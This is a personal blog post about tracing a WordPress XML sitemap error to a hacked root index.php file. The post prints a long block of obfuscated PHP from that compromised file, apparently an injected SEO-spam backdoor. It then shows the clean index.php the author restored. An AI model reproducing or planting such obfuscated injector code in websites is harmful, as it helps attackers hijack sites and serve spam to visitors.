Skip to content

How a Mere XML Sitemap Error Revealed A Shocking Fact

Introduction

An XML Sitemap is required to allow search engines to easily crawl and index your blog. As a full-time network engineer and hobby blogger, I had not much time to build my own sitemap. So, like all blog folks out there, I used plugins to generate it.

This article shows you how a simple XML Sitemap error can hide more that you think.

XML Sitemap error

I got since more than 3 months a weird XML sitemap error message:

XML declaration allowed only at the start of the document

XML declaration allowed only at the start of the document
XML declaration allowed only at the start of the document

I first thought it was due to the Yoast SEO plugin. Therefore I deactivated the Yoast-generated XML sitemap.

deactivating yoast seo xml sitemap
deactivating yoast seo xml sitemap

and installed another sitemap plugin which generated a correct (at least to my eyes) XML sitemap.

However, Google search console still flags my blog as Soft 404. I spent whole weekends and vacation days trying to reverse engineer the reason behind this Google rejection.

blog pages are excluded from google
blog pages are excluded from google

All articles I read point to “thin content” or “redirecting 404 error” pages.

I was not really convinced.

So I tried something else: I signed out my blog from Adsense and resubmitted my blog. I got a rejection from Google telling me there was something wrong:

google adsense team reply
google adsense team reply

Searching for solutions

Searching endlessly in the Internet, I read in StackOverflow forums that there could be a white space slipping in functions.php file:

xml sitemap error possible solution 1
xml sitemap error possible solution 1
xml sitemap error possible solution 2
xml sitemap error possible solution 2
xml sitemap error possible solution 3
xml sitemap error possible solution 3

So I went to all php files of my wordpress theme and searched all before and after white spaces. I also tried the php code I copied from the above mentioned solution into the theme’s index.php. No success.

Then I deactivated all my wordpress plugins except Yoast. I retried to generate the XML sitemap. No success.

With pure coincidence (or maybe good attention to details LOL) I noticed something visually weird in the index.php file under the root folder of my blog web server. When I edit it with Notepad, there are strange characters:

<?php
$O0__OOO0_0='BEGINJ6Pn2HmH0e568SXnR6KRkmP5tQbh7KEW';
$O0_0OO_O0_='granule';
$O__0OOO00_='1000147';
$O0_OO_O0_0=1160;
$O__O0O_00O='/bamboo\/(\d+)_birch_(\d+)\.jsp/is';
$O_0_OO_0O0='bamboo/{G}_birch_{L}.jsp';
$O__OO00O_0=1103;
$O0_0OOO_0_='atlantic.php';
$OOO0__0_0O=urldecode("%6E1%7A%62%2F%6D%615%5C%76%740%6928%2D%70%78%75%71%79%2A6%6C%72%6B%64%679%5F%65%68%63%73%77%6F4%2B%6637%6A");$O_OO_00O_0=$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{38}.$OOO0__0_0O{6}.$OOO0__0_0O{18}.$OOO0__0_0O{23}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{2}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10};$O__0_0O0OO=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23}.$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{25};$O__0_OO00O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10};$O0__0O0OO_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{6}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{6};$O0O0_O0__O=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{23}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{12}.$OOO0__0_0O{0}.$OOO0__0_0O{27};$OO_O0_0O_0=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{29}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{35}.$OOO0__0_0O{18}.$OOO0__0_0O{10};$O0OO0__0_O=$OOO0__0_0O{12}.$OOO0__0_0O{27}.$OOO0__0_0O{0}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{18}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{3}.$OOO0__0_0O{35}.$OOO0__0_0O{24}.$OOO0__0_0O{10};$O0_O__00OO=$OOO0__0_0O{38}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{16}.$OOO0__0_0O{18}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{0}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$OO_00__0OO=$OOO0__0_0O{31}.$OOO0__0_0O{10}.$OOO0__0_0O{10}.$OOO0__0_0O{16}.$OOO0__0_0O{29}.$OOO0__0_0O{3}.$OOO0__0_0O{18}.$OOO0__0_0O{12}.$OOO0__0_0O{23}.$OOO0__0_0O{26}.$OOO0__0_0O{29}.$OOO0__0_0O{19}.$OOO0__0_0O{18}.$OOO0__0_0O{30}.$OOO0__0_0O{24}.$OOO0__0_0O{20};$O0_0_O0O_O=$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{29}.$OOO0__0_0O{30}.$OOO0__0_0O{17}.$OOO0__0_0O{12}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{33};$O0O_OO__00=$OOO0__0_0O{32}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{38}.$OOO0__0_0O{18}.$OOO0__0_0O{0}.$OOO0__0_0O{32}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{35}.$OOO0__0_0O{0};$OO0OO0__0_=$OOO0__0_0O{33}.$OOO0__0_0O{18}.$OOO0__0_0O{3}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{16}.$OOO0__0_0O{23}.$OOO0__0_0O{6}.$OOO0__0_0O{32}.$OOO0__0_0O{30};$OOO__00O_0=$OOO0__0_0O{33}.$OOO0__0_0O{35}.$OOO0__0_0O{32}.$OOO0__0_0O{25}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{0}.$OOO0__0_0O{0}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{10};$O_0O__0O0O=$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{29}.$OOO0__0_0O{10}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{30}.$OOO0__0_0O{29}.$OOO0__0_0O{23}.$OOO0__0_0O{12}.$OOO0__0_0O{5}.$OOO0__0_0O{12}.$OOO0__0_0O{10};$O_00O0O_O_=$OOO0__0_0O{16}.$OOO0__0_0O{24}.$OOO0__0_0O{30}.$OOO0__0_0O{27}.$OOO0__0_0O{29}.$OOO0__0_0O{5}.$OOO0__0_0O{6}.$OOO0__0_0O{10}.$OOO0__0_0O{32}.$OOO0__0_0O{31}.$OOO0__0_0O{29}.$OOO0__0_0O{6}.$OOO0__0_0O{23}.$OOO0__0_0O{23};$OOOO0_0__0=$OOO0__0_0O{27}.$OOO0__0_0O{30}.$OOO0__0_0O{10}.$OOO0__0_0O{31}.$OOO0__0_0O{35}.$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{3}.$OOO0__0_0O{20}.$OOO0__0_0O{0}.$OOO0__0_0O{6}.$OOO0__0_0O{5}.$OOO0__0_0O{30};$O0O__0_OO0=$OOO0__0_0O{3}.$OOO0__0_0O{6}.$OOO0__0_0O{33}.$OOO0__0_0O{30}.$OOO0__0_0O{22}.$OOO0__0_0O{36}.$OOO0__0_0O{29}.$OOO0__0_0O{26}.$OOO0__0_0O{30}.$OOO0__0_0O{32}.$OOO0__0_0O{35}.$OOO0__0_0O{26}.$OOO0__0_0O{30};$O0O_0O_0O_=$OOO0__0_0O{33}.$OOO0__0_0O{10}.$OOO0__0_0O{24}.$OOO0__0_0O{29}.

Doing a quick Google request to determine the indexation status of my blog, I was shocked to see chinese symbols on my site:

chinese symbols popping up on my blog
chinese symbols popping up on my blog
still other chinese symbols popping up on my blog
still other chinese symbols popping up on my blog

What the fuck are chinese characters doing on my blog?

Then I remembered an incident in last October. I once received a notification from Google Webmaster Console that someone was added as a property owner:

new property owner was probably a hacker
new property owner was probably a hacker

Since I was in public transport on the way to work (and I have no time during the day for blogging), I could not do anything until late that evening. I removed a weird TXT file from the root of the server and changed my passwords. I thought I solved the issue and that I defeated the hacker.

Wrong! Now I am convinced that my blog was hacked and left with hidden anomalies!

First instinct was to back this file up, delete the “alien” characters and have a clean index.php file again:

<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/

/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require( dirname( __FILE__ ) . '/wp-blog-header.php' );

I generated the Yoast XML Sitemap file again. Bingo!

new xml sitemap generated
new xml sitemap generated

And Google is now happy with my new results (it is in German below. It means “indexation is requested”):

live URL verification leads to a good result
live URL verification leads to a good result

Conclusion

In my case, the solution to the error “xml declaration allowed only at the start of the document” was to repair a corrupted index.php file. I don’t know how I missed this thing. Maybe I need to consider a course on WordPress security.

References

  • https://github.com/Yoast/wordpress-seo/issues/7105
  • https://yoast.com/help/how-to-check-for-plugin-conflicts/
  • https://stackoverflow.com/questions/5479533/problem-xml-declaration-allowed-only-at-the-start-of-the-document
  • https://stackoverflow.com/questions/14685893/xml-declaration-allowed-only-at-the-start-of-the-document
  • https://www.searchenginejournal.com/google-search-console-index-coverage-report-guide/346514/
  • https://support.google.com/webmasters/answer/181708?
  • https://www.reliablesoft.net/soft-404/
  • https://www.hallaminternet.com/what-are-soft-404-errors-will-they-affect-rankings/
  • https://seo-radio.de/google-behandelt-ausverkaufte-produktseiten-als-soft-404/
  • https://pepperlandmarketing.com/blog/fix-soft-404-errors/
  • https://forum.webflow.com/t/submitted-url-seems-to-be-a-soft-404/53674
Published inGeek Stuff

Be First to Comment

Leave a Reply

Your email address will not be published. Required fields are marked *

copyright 2020 keyboardbanger.com